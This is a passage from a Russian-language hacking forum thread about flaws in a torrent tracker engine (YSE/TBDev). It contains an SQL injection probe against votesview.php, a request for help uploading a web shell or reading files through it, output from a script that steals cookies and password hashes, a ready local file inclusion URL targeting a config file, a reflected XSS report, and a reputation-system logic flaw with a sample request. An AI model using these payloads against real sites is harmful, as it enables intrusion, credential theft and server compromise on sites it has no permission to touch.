|
votesview.php?requestid=-99'
:) А вообще помогите через неё шелл залить/прочитать файл... votesview.php есть в YSE немного старее чем с СВН, да и в tbsource дефульт есть |
Trying to get your cookies... [DONE]
Trying to get passhash: 00000000000000000000000000000000 [DONE] Trying to get salt: 11111111111111111111 [DONE] Я не понял чо passhash 0000000.... и salt 111111111... где проблема ? |
Цитата:
|
HAXTA4OK, понятно... :S
|
Восстанавливаем забытую тему =)
Уязвимость скрипта: modal_mailbox.php (чат) Тип: Локальный Инклуд Уязвимый параметр: ?action Exploit:http://examle.com/modal_mailbox.php?action=../include/config Внимание, возможно потребуется регистрация на сайте. Автор: OxoTnik |
Небольшой UP
passive XSS (reflected) Уязвимый сценарий: redirector.php Exploit: Цитата:
|
Бу, ну как - новых уязвимостей не появилось?
А-то руки чешутся git push сделать с багфиксами =) А пока поделюсь: Как известно, в движке, на данный момент, есть система репутации (Респекты). Так вот, даже если юзер отключил приём личных сообщений, то: 1. Ему вс1равно будут идти сообщения от системы репутации 2. Система не делает валидацию того за то получает человек респект (т.е можно получить/дать респект/антиреспект за торрент который ты не заливал/которого вообще не сущесвтует ) Пример: simpaty.php?action=add&good&targetid=1&type=torren t1 Меняем type=torrent1 на torrent12345 и респект всёравно проходит. Не совсем уязвимость, скорее алгоритмическая недоработка |
Отличное отношение к багам. Типичный "разработчик".
|
to yuna движок был интересен в свое время, сейчас аналогов много , а делать гит с багфиксами, смысл, если двиг не обновляется
|
HAXTA4OK, а что в твоем понимании "обновляется"?
|
| Время: 10:31 |